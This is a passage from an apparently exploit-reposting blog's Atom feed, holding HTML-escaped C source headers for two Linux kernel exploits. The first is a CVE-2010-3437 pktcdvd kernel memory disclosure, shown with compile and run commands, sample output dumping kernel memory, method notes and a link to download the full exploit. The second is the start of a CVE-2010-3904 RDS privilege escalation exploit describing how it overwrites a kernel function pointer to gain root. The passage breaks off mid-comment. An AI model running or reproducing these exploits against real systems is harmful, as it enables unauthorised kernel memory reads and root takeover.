comments"&gt;* &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Information:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   https://bugzilla.redhat.com/show_bug.cgi?id=638085&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   pktcdvd_device from the global pkt_devs array.  The index into this&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   array is provided directly by the user and is a signed integer, so the&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   comparison to ensure that it falls within the bounds of this array will&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   fail when provided with a negative index.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Usage:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   $ gcc cve-2010-3437.c -o cve-2010-3437&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   $ ./cve-2010-3437&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   usage: ./cve-2010-3437 &lt;address&gt; &lt;length&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   $ ./cve-2010-3437 0xc0102290 64&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] searching for pkt_devs kernel symbol...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] found pkt_devs at 0xc086fcc0&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] opening pktcdvd device...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] calculated dereference address of 0x790070c0&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] mapping page at 0x79007000 for pktcdvd_device dereference...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] setting up fake pktcdvd_device structure...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   [+] dumping kmem to output...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Notes:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   Pass the desired kernel memory address and dump length as arguments.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   We can disclose 4 bytes of arbitrary kernel memory per ioctl call by &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   specifying a large negative device index, causing the kernel to &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   dereference to our fake pktcdvd_device structure in userspace and copy&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   data to userspace from an attacker-controlled address.  Since only 4 &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   bytes of kmem are disclosed per ioctl call, large dump sizes may take a&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   few seconds.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*   Tested on Ubuntu Lucid 10.04.  32-bit only for now.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*/&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdio.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdlib.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdint.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;string.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;errno.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;unistd.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;fcntl.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/types.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/ioctl.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/utsname.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/mman.h&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/exploits/15150/"&gt;&lt;span style="font-weight: bold;"&gt;Download Full&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4247201541378107373?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/dyA7iZlRuD4" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4247201541378107373?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4247201541378107373?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/dyA7iZlRuD4/linux-kernel-2636-kernel-memory.html" title="Linux Kernel  2.6.36 Kernel Memory Disclosure" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/linux-kernel-2636-kernel-memory.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUYHQXk8fCp7ImA9Wx9WEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1457025648251894467</id><published>2010-12-27T18:17:00.000+07:00</published><updated>2011-01-17T18:18:50.774+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-17T18:18:50.774+07:00</app:edited><title>Linux RDS Protocol Local Privilege Escalation</title><content type="html">&lt;code class="cpp comments"&gt;/* &lt;/code&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Linux Kernel &lt;= 2.6.36-rc8 RDS privilege escalation exploit&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* CVE-2010-3904&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* by Dan Rosenberg &lt;drosenberg@vsecurity.com&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Copyright 2010 Virtual Security Research, LLC&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* The handling functions for sending and receiving RDS messages&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* use unchecked __copy_*_user_inatomic functions without any&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* access checks on user-provided pointers.  As a result, by&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* passing a kernel address as an iovec base address in recvmsg-style&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* calls, a local user can overwrite arbitrary kernel memory, which&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* can easily be used to escalate privileges to root.  Alternatively,&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* an arbitrary kernel read can be performed via sendmsg calls.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* This exploit is simple - it resolves a few kernel symbols,&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* sets the security_ops to the default structure, then overwrites&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* a function pointer (ptrace_traceme) in that structure to point&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* to the payload.  After triggering the payload, the original&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* value is restored.  Hard-coding the offset of this function&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* pointer is a bit inelegant, but I wanted to keep it simple and&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* architecture-independent (i.e. no inline assembly).&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* The vulnerability is yet another example of why you shouldn't&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* allow loading of random packet families unless you actually&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; 